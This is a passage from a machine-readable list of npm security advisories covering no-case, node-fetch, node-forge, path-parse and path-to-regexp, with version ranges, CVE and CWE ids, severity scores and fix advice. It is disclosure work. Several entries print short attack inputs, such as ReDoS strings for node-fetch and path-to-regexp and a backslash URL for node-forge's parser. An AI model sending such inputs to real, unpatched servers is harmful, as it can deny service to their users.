], "summary": "Regular Expression Denial of Service in no-case", "details": "Affected versions of `no-case` are vulnerable to a regular expression denial of service when parsing untrusted user input.\n\n\n## Recommendation\n\nUpdate to version 2.3.2 or later.", "affected": [ { "package": { "name": "no-case", "ecosystem": "npm", "purl": "pkg:npm/no-case" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-ff6r-5jwm-8292/GHSA-ff6r-5jwm-8292.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16099" }, { "type": "WEB", "url": "https://github.com/blakeembrey/no-case/issues/17" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-ff6r-5jwm-8292" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/529" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:26Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r683-j2x4-v87g", "published": "2022-01-21T23:55:52Z", "modified": "2023-11-08T04:07:30.211593Z", "aliases": [ "CVE-2022-0235" ], "summary": "node-fetch forwards secure headers to untrusted sites", "details": "node-fetch forwards secure headers such as `authorization`, `www-authenticate`, `cookie`, \u0026 `cookie2` when redirecting to a untrusted site.", "affected": [ { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-r683-j2x4-v87g/GHSA-r683-j2x4-v87g.json" } }, { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.6.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-r683-j2x4-v87g/GHSA-r683-j2x4-v87g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0235" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/pull/1449/commits/5c32f002fdd65b1c6a8f1e3620210813d45c7e60" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/pull/1453" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/1ef4b560a17e644a02a3bfdea7631ffeee578b35" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/36e47e8a6406185921e4985dcbeff140d73eaa10" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/5c32f002fdd65b1c6a8f1e3620210813d45c7e60" }, { "type": "WEB", "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf" }, { "type": "PACKAGE", "url": "https://github.com/node-fetch/node-fetch" }, { "type": "WEB", "url": "https://huntr.dev/bounties/d26ab655-38d6-48b3-be15-f9ad6b6ae6f7" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00007.html" } ], "database_specific": { "cwe_ids": [ "CWE-173", "CWE-200", "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2022-01-18T22:51:22Z", "nvd_published_at": "2022-01-16T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vp56-6g26-6827", "published": "2022-08-02T00:00:25Z", "modified": "2023-11-08T04:08:52.815695Z", "aliases": [ "CVE-2022-2596" ], "summary": "node-fetch Inefficient Regular Expression Complexity ", "details": "[node-fetch](https://www.npmjs.com/package/node-fetch) is a light-weight module that brings window.fetch to node.js.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the `isOriginPotentiallyTrustworthy()` function in `referrer.js`, when processing a URL string with alternating letters and periods, such as `'http://' + 'a.a.'.repeat(i) + 'a'`.", "affected": [ { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.2.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-vp56-6g26-6827/GHSA-vp56-6g26-6827.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2596" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/pull/1611" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/28802387292baee467e042e168d92597b5bbbe3d" }, { "type": "PACKAGE", "url": "https://github.com/node-fetch/node-fetch" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/releases/tag/v3.2.10" }, { "type": "WEB", "url": "https://huntr.dev/bounties/a7e6a136-0a4b-46c4-ad20-802f1dd60bf7" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-08-04T17:37:24Z", "nvd_published_at": "2022-08-01T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w7rc-rwvf-8q5r", "published": "2020-09-10T17:46:21Z", "modified": "2024-07-15T19:46:22Z", "aliases": [ "CVE-2020-15168" ], "related": [ "CVE-2020-15168" ], "summary": "The `size` option isn't honored after following a redirect in node-fetch", "details": "### Impact\nNode Fetch did not honor the `size` option after following a redirect, which means that when a content size was over the limit, a `FetchError` would never get thrown and the process would end without failure.\n\nFor most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after `fetch()` has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.\n\n### Patches\nWe released patched versions for both stable and beta channels:\n\n- For `v2`: 2.6.1\n- For `v3`: 3.0.0-beta.9\n\n### Workarounds\nNone, it is strongly recommended to update as soon as possible.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [node-fetch](https://github.com/node-fetch/node-fetch/issues/new?assignees=\u0026labels=question\u0026template=support-or-usage.md\u0026title=Question%3A+)\n* Contact one of the core maintainers.", "affected": [ { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-w7rc-rwvf-8q5r/GHSA-w7rc-rwvf-8q5r.json" } }, { "package": { "name": "node-fetch", "ecosystem": "npm", "purl": "pkg:npm/node-fetch" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0-beta.1" }, { "fixed": "3.0.0-beta.9" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.0.0-beta.8", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-w7rc-rwvf-8q5r/GHSA-w7rc-rwvf-8q5r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15168" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/2358a6c2563d1730a0cdaccc197c611949f6a334" }, { "type": "WEB", "url": "https://github.com/node-fetch/node-fetch/commit/eaff0094c4dfdd5b78711a8c4f1b61e33d282072" }, { "type": "PACKAGE", "url": "https://github.com/node-fetch/node-fetch" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-09-10T17:44:09Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2r2c-g63r-vccr", "published": "2022-03-18T23:10:48Z", "modified": "2023-11-08T04:08:35.918577Z", "aliases": [ "CVE-2022-24773" ], "summary": "Improper Verification of Cryptographic Signature in `node-forge`", "details": "### Impact\n\nRSA PKCS#1 v1.5 signature verification code is not properly checking `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest.\n\n### Patches\n\nThe issue has been addressed in `node-forge` `1.3.0`.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at [example email address](mailto:security@digitalbazaar.com)", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-2r2c-g63r-vccr/GHSA-2r2c-g63r-vccr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-2r2c-g63r-vccr" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24773" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:10:48Z", "nvd_published_at": "2022-03-18T14:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5rrq-pxf6-6jx5", "published": "2022-01-08T00:22:42Z", "modified": "2022-01-07T22:20:53Z", "summary": "Prototype Pollution in node-forge debug API.", "details": "### Impact\nThe `forge.debug` API had a potential prototype pollution issue if called with untrusted input. The API was only used for internal debug purposes in a safe way and never documented or advertised. It is suspected that uses of this API, if any exist, would likely not have used untrusted inputs in a vulnerable way.\n\n### Patches\nThe `forge.debug` API and related functions were removed in 1.0.0.\n\n### Workarounds\nDon't use the `forge.debug` API directly or indirectly with untrusted input.\n\n### References\n- https://www.huntr.dev/bounties/1-npm-node-forge/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge).\n* Email us at support@digitalbazaar.com.", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-5rrq-pxf6-6jx5/GHSA-5rrq-pxf6-6jx5.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5rrq-pxf6-6jx5" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:20:53Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-8fr3-hfg3-gpgp", "published": "2022-01-21T23:36:19Z", "modified": "2023-11-08T04:07:28.545607Z", "aliases": [ "CVE-2022-0122" ], "summary": "Open Redirect in node-forge", "details": "parseUrl functionality in node-forge mishandles certain uses of backslash such as `https:/\\/\\/\\` and interprets the URI as a relative path. ", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-8fr3-hfg3-gpgp/GHSA-8fr3-hfg3-gpgp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0122" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/db8016c805371e72b06d8e2edfe0ace0df934a5e" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" }, { "type": "WEB", "url": "https://huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2022-01-13T18:49:59Z", "nvd_published_at": "2022-01-06T05:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-92xj-mqp7-vmcj", "published": "2020-09-14T21:42:09Z", "modified": "2025-01-14T08:57:27.810691Z", "aliases": [ "CVE-2020-7720" ], "summary": "Prototype Pollution in node-forge", "details": "The package node-forge before 0.10.0 is vulnerable to Prototype Pollution via the util.setPath function. Note: version 0.10.0 is a breaking change removing the vulnerable functions.", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-92xj-mqp7-vmcj/GHSA-92xj-mqp7-vmcj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7720" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/6a1e3ef74f6eb345bcff1b82184201d1e28b6756" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/blob/master/CHANGELOG.md#removed" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-609293" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-NODEFORGE-598677" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2020-09-14T21:41:51Z", "nvd_published_at": "2020-09-01T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cfm4-qjh2-4765", "published": "2022-03-18T23:09:54Z", "modified": "2023-11-08T04:08:35.796827Z", "aliases": [ "CVE-2022-24771" ], "summary": "Improper Verification of Cryptographic Signature in node-forge", "details": "### Impact\n\nRSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used.\n\n### Patches\n\nThe issue has been addressed in `node-forge` `1.3.0`.\n\n### References\n\nFor more information, please see\n[\"Bleichenbacher's RSA signature forgery based on implementation error\"](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/)\nby Hal Finney.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at [example email address](mailto:security@digitalbazaar.com)", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-cfm4-qjh2-4765/GHSA-cfm4-qjh2-4765.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24771" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:09:54Z", "nvd_published_at": "2022-03-18T14:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gf8q-jrpm-jvxq", "published": "2022-01-08T00:22:02Z", "modified": "2022-01-07T22:20:43Z", "summary": "URL parsing in node-forge could lead to undesired behavior.", "details": "### Impact\nThe regex used for the `forge.util.parseUrl` API would not properly parse certain inputs resulting in a parsed data structure that could lead to undesired behavior.\n\n### Patches\n`forge.util.parseUrl` and other very old related URL APIs were removed in 1.0.0 in favor of letting applications use the more modern WHATWG URL Standard API.\n\n### Workarounds\nEnsure code does not directly or indirectly call `forge.util.parseUrl` with untrusted input.\n\n### References\n- https://www.huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at support@digitalbazaar.com\n", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-gf8q-jrpm-jvxq/GHSA-gf8q-jrpm-jvxq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-gf8q-jrpm-jvxq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0122" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge" }, { "type": "WEB", "url": "https://www.huntr.dev/bounties/41852c50-3c6d-4703-8c55-4db27164a4ae" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:20:43Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-wxgw-qj99-44c2", "published": "2022-01-08T00:22:40Z", "modified": "2022-01-07T22:20:50Z", "summary": "Prototype Pollution in node-forge util.setPath API", "details": "### Impact\n`forge.util.setPath` had a potential prototype pollution issue if called with untrusted keys. This API was not used by forge itself.\n\n### Patches\nThe `forge.util.setPath` API and related functions were removed in 0.10.0.\n\n### Workarounds\nDon't call `forge.util.setPath` directly or indirectly with untrusted keys.\n\n### References\n- https://security.snyk.io/vuln/SNYK-JS-NODEFORGE-598677\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7720\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge).\n* Email us at support@digitalbazaar.com.", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wxgw-qj99-44c2/GHSA-wxgw-qj99-44c2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-wxgw-qj99-44c2" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:20:50Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-x4jg-mjrx-434g", "published": "2022-03-18T23:10:28Z", "modified": "2023-11-08T04:08:35.855910Z", "aliases": [ "CVE-2022-24772" ], "summary": "Improper Verification of Cryptographic Signature in node-forge", "details": "### Impact\n\nRSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.\n\n### Patches\n\nThe issue has been addressed in `node-forge` `1.3.0`.\n\n### References\n\nFor more information, please see\n[\"Bleichenbacher's RSA signature forgery based on implementation error\"](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/)\nby Hal Finney.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [forge](https://github.com/digitalbazaar/forge)\n* Email us at [example email address](mailto:security@digitalbazaar.com)", "affected": [ { "package": { "name": "node-forge", "ecosystem": "npm", "purl": "pkg:npm/node-forge" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-x4jg-mjrx-434g/GHSA-x4jg-mjrx-434g.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-x4jg-mjrx-434g" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24772" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/3f0b49a0573ef1bb7af7f5673c0cfebf00424df1" }, { "type": "WEB", "url": "https://github.com/digitalbazaar/forge/commit/bb822c02df0b61211836472e29b9790cc541cdb2" }, { "type": "PACKAGE", "url": "https://github.com/digitalbazaar/forge" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2022-03-18T23:10:28Z", "nvd_published_at": "2022-03-18T14:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hj48-42vr-x3v9", "published": "2021-08-10T15:33:47Z", "modified": "2025-01-14T08:57:22.791123Z", "aliases": [ "CVE-2021-23343" ], "summary": "Regular Expression Denial of Service in path-parse", "details": "Affected versions of npm package `path-parse` are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.", "affected": [ { "package": { "name": "path-parse", "ecosystem": "npm", "purl": "pkg:npm/path-parse" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-hj48-42vr-x3v9/GHSA-hj48-42vr-x3v9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23343" }, { "type": "WEB", "url": "https://github.com/jbgutierrez/path-parse/issues/8" }, { "type": "WEB", "url": "https://github.com/jbgutierrez/path-parse/pull/10" }, { "type": "WEB", "url": "https://github.com/jbgutierrez/path-parse/commit/eca63a7b9a473bf6978a2f5b7b3343662d1506f7" }, { "type": "PACKAGE", "url": "https://github.com/jbgutierrez/path-parse" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a32cb3eda3b19096ad48ef1e7aa8f26e005f2f63765abb69ce08b85@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1279028" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-05-19T21:02:21Z", "nvd_published_at": "2021-05-04T09:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9wv6-86v2-598j", "published": "2024-09-09T20:19:15Z", "modified": "2025-01-24T21:31:27Z", "aliases": [ "CVE-2024-45296" ], "related": [ "CGA-5gf3-hjcj-6qq8", "CGA-6792-m89f-pxqr", "CGA-9whg-c95h-926g", "CGA-fr32-9wwp-hj4r", "CGA-hvqq-cfqx-vpqj", "CGA-m4g6-hwg9-252j", "CGA-p73v-8rhw-pm6p", "CGA-wxf4-3vvq-3j2r", "CGA-x8g8-9rwj-j985" ], "summary": "path-to-regexp outputs backtracking regular expressions", "details": "### Impact\n\nA bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (`.`). For example, `/:a-:b`.\n\n### Patches\n\nFor users of 0.1, upgrade to `0.1.10`. All other users should upgrade to `8.0.0`.\n\nThese versions add backtrack protection when a custom regex pattern is not provided:\n\n- [0.1.10](https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10)\n- [1.9.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0)\n- [3.3.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0)\n- [6.3.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0)\n\nThey do not protect against vulnerable user supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.\n\nVersion [7.1.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0) can enable `strict: true` and get an error when the regular expression might be bad.\n\nVersion [8.0.0](https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0) removes the features that can cause a ReDoS.\n\n### Workarounds\n\nAll versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change `/:a-:b` to `/:a-:b([^-/]+)`.\n\nIf paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.\n\n### Details\n\nUsing `/:a-:b` will produce the regular expression `/^\\/([^\\/]+?)-([^\\/]+?)\\/?$/`. This can be exploited by a path such as `/a${'-a'.repeat(8_000)}/a`. [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) has a good example of why this occurs, but the TL;DR is the `/a` at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the `:a-:b` on the repeated 8,000 `-a`.\n\nBecause JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.\n\n### References\n\n* [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n* [Detailed blog post](https://blakeembrey.com/posts/2024-09-web-redos/)", "affected": [ { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.0" }, { "fixed": "1.9.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.1.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "8.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "3.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } }, { "package": { "name": "path-to-regexp", "ecosystem": "npm", "purl": "pkg:npm/path-to-regexp" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "6.3.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9wv6-86v2-598j/GHSA-9wv6-86v2-598j.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296" }, { "type": "WEB", "url": 